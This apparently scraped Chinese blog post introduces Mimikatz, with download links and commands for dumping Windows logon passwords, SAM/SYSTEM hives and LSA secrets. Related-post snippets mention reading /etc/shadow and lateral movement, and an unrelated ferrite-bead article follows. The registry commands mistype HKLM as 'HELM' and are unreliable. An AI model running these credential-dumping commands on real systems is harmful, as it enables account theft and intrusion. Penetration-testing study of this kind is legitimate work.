Mimikatz Windows、Linux基本使用

已于 2022-12-02 18:12:16 修改
阅读量9.8k 收藏 43
点赞数 15
分类专栏: 网络安全笔记 文章标签: windows 测试工具 linux
于 2022-12-02 16:30:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_51741741/article/details/128150213
版权

一、前言:

Mimikatz 一款密码抓取抓取神器,除了抓取密码之外,听说还可以导出谷歌浏览器的密码,当然第二种我也不会

二、Mimikatz下载

百度网盘:

链接:https://pan.baidu.com/s/166t4E-SfvHyDwuxlfq6wTw

提取码:3azc

Github:

https://github.com/gentilkiwi/mimikatz

三、Mimikatz基本用法

   mimikatz # log

   mimikatz # privilege::debug

   mimikatz # sekurlsa::logonpasswords

    Windows使用方法

    抓取本地SAM文件中的密码从注册表中导出

    Reg save HELM/System sys.hiv //获取System注册表信息,导出为sys.hiv

    Reg save HELM/SAM sam.hiv    //获取Sam注册表信息,导出为Sam.hiv

   

    用Mimikatz解密samsys这俩个文件

    Privilege::debug //提升权限

    lsadump::sam /sam:sam.hiv /system:sys.hiv //运行

利用powershell执行

Mimikatz.exe “privilege::debug” “sekurlsa::logonpasswords” exit > 1.txt

Linux基本使用方法

mimikatz-2.2.0-20220919.zip
01-06
mimikatz-2.2.0-20220919.zip
mimikatz_trunk2.1.1.zip
08-03
mimikatz历史版本,有可能能在win10上运行成功,mimikatz_trunk2.1.1.zip
揭秘最为知名的黑客工具之一:Mimikatze,黑客技术零基础入门到精通教程!
资深程序员,曾自学JAVA,C#,如今从业于网安行业
03-11 929
Mimikatz 是由Benjamin Delpy开发的开源工具,功能强大,能够从Windows系统中提取明文密码、Kerberos票据、密码哈希等敏感信息。Mimikatz不仅在渗透测试中广泛应用,也是安全研究和防御的重要参考工具。
mimikatz工具
03-08
本工具可以提取存于windows电脑内存中的密码,安全无毒,最新版工具.
mimikatz猕猴桃
10-19
用于抓取windows用户密码,懂的人都知道
mimikatz 2.2.0 版本下载
gitblog_09743的博客
10-28 1642
mimikatz 2.2.0 版本下载下载地址】mimikatz2.2.0版本下载 mimikatz 2.2.0 版本下载 项目地址: https://gitcode.com/open-source-toolkit/113e9...
mimikatz.zip
08-14
mimikatz 是一款windows平台下的工具,它具备很多强大的功能,最重要的是可以从lsass.exe进程中获取windows的账号明文密码。
mimikatz
子曰小玖的博客
04-29 1201
mimikatz mimikatzis a tool I've made to learnCand make somes experiments with Windows security. It's now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memor...
mimikatz(windows 明文密码抓取工具)
04-02
windows 明文密码抓取工具,分别有32位和64位版本,在XP和win 7 旗舰版上测试成功
mimikatz2.1
04-01
用过早期版的人都知道它的强大,能读取Windows密码,操作简单快捷,由于2.0版对Windows10失效,So作者更新了2.1版!(还未在win10下测试....下班回去就测!)
mimikatz工具包
01-25
轻量级调试器神器 – mimikatz – 直接抓取 Windows 明文密码! Ping : 百寞' Blog » Blog Archive » 轻量级调试器神器 – mimikatz – 直接...
WindowsLinux密码破解—John、Hydra、hashcat、Mimikatz等工具基本使用
negnegil的博客
09-16 3594
密码破解字典 https://github.com/danielmiessler/SecLists Linux密码破解 在linux中,密码放在/etc/passwd和/etc/shadow中,如果我们读取到了加密密码,就可以复制下来对其进行破解。 cat /etc/passwd cat /etc/shadow john the ripper 加密密码破解字典: https://github.com/danielmiessler/SecLists/blob/master/Passwords/Leak
【内网渗透】mimikatz 基本使用
君行路的博客
08-14 2428
文章目录前言1. 工具简介2. 提升权限 privilege::debug3. 抓取明文密码 sekurlsa::logonpasswords4. sekurlsa模块 获取密码信息4.1 procdump + mimikatz 加载dmp文件,并导出其中的明文密码4.2 导出lsass.exe进程中所有的票据 sekurlsa::tickets /export5. lsadump模块 读取域控中域成员Hash5.1 读取所有域用户的哈希 lsadump::lsa /patch5.2 查看域内指定用户信息,
kali中如何使用mimikatz
01-15
以下是使用MimiKatz基本步骤: 1. **安装MimiKatz**: 打开终端,首先确保已经更新了包列表并安装了依赖工具,如.NET Core: ``` sudo apt-get update sudo apt-get install dotnet-sdk ``` 然后通过NuGet...
内网渗透,横向移动总结(mimikatz域控)
墨痕诉清风的博客
08-23 3215
前言 通常我们在渗透过程中从外围打点进入内网后拿到主机提升到system权限,这一台主机就已经拿下。但是我们进入内网的目标还是拿下尽可能多的主机,这时候选择横向移动的方法就尤为重要。今天就对一些常用的横向手法进行一个总结,有不足之处欢迎师傅们进行斧正。 本次实验均在本地搭建靶场进行,靶场拓扑图如下: 利用windows远程连接命令 ipc连接 IPC$(Internet Process Connection) 是为了让进程之间通信的一种“管道”,通过提供用户名密码建立了一条安全的、加密的
Mimikatz获取系统密码攻防研究
weixin_44023460的博客
06-23 4903
Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具,从早期1.0版本到现在的2.1.1 20180205版本,其功能得到了很大的提升和扩展。Mimikatz最新版本一共三个文件(mimilib.dll、mimikatz.exe、mimidrv.sys),分为Win32位(多了一个mimilove.exe文件)和X64位。通过它们可以提升进程权限、注
mimikatz】内网渗透工具 下载 基本操作+【procdump】 下载 操作
吉吉的博客
01-12 5306
内网渗透,Windows域渗透工具 mimikatz和procdump 下载 + 基本操作
磁珠选型
最新发布
03-25
### 关于磁珠选型的相关信息 磁珠是一种常用的电子元件,主要用于抑制高频噪声和电磁干扰(EMI)。在硬件设计中,合理选择磁珠对于系统的稳定性和性能至关重要。以下是关于磁珠选型的一些关键因素: #### 1. 频率特性 磁珠的主要功能是在特定频率范围内提供高阻抗以衰减信号中的噪声成分。因此,在选型时需关注其阻抗随频率变化的曲线图。通常情况下,制造商会在数据手册中提供此类图表以便工程师评估磁珠是否适合目标应用环境[^3]。 #### 2. 直流电阻 (DCR) 直流电阻会影响电路的工作效率以及功耗水平。较低的 DCR 值意味着更少的能量损失, 这一点尤其重要当电流较大或者需要长时间运行的应用场景下。应仔细权衡所需滤波效果与可接受的最大压降之间的关系来决定合适的型号规格[^4]。 #### 3. 饱和电流能力 由于铁氧体材料制成的磁芯存在饱和现象,过高的工作电流可能导致磁导率下降从而削弱了原本预期达到的良好过滤作用。所以了解并确认所选用的产品能够承受实际负载条件下的峰值电流是非常必要的步骤之一[^5]。 #### 4. 尺寸大小及封装形式 随着电子产品日益向小型化方向发展,空间利用率成为越来越重要的考量要素。设计师应当依据PCB布局规划挑选恰当外形尺寸及其对应安装方式(表面贴装SMD还是通孔THD)类型的组件满足整体结构需求同时兼顾装配工艺可行性等方面的要求[^6]。 ```python # 示例 Python 脚本展示如何读取 CSV 文件获取不同品牌磁珠参数对比表 import pandas as pd def load_bead_data(file_path): df = pd.read_csv(file_path) return df[['Manufacturer', 'Part Number', 'Impedance @ Frequency(MHz)', 'DC Resistance(mOhm)', 'Saturation Current(A)']] df_magnetic_beads = load_bead_data('Magnetic_Beeds_Specifications.csv') print(df_magnetic_beads.head()) ``` 上述脚本展示了通过 Pandas 库加载包含各种磁珠特性的CSV文件,并提取关键字段形成简洁明了的数据框视图供进一步分析比较之用。 ---
评论 13
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值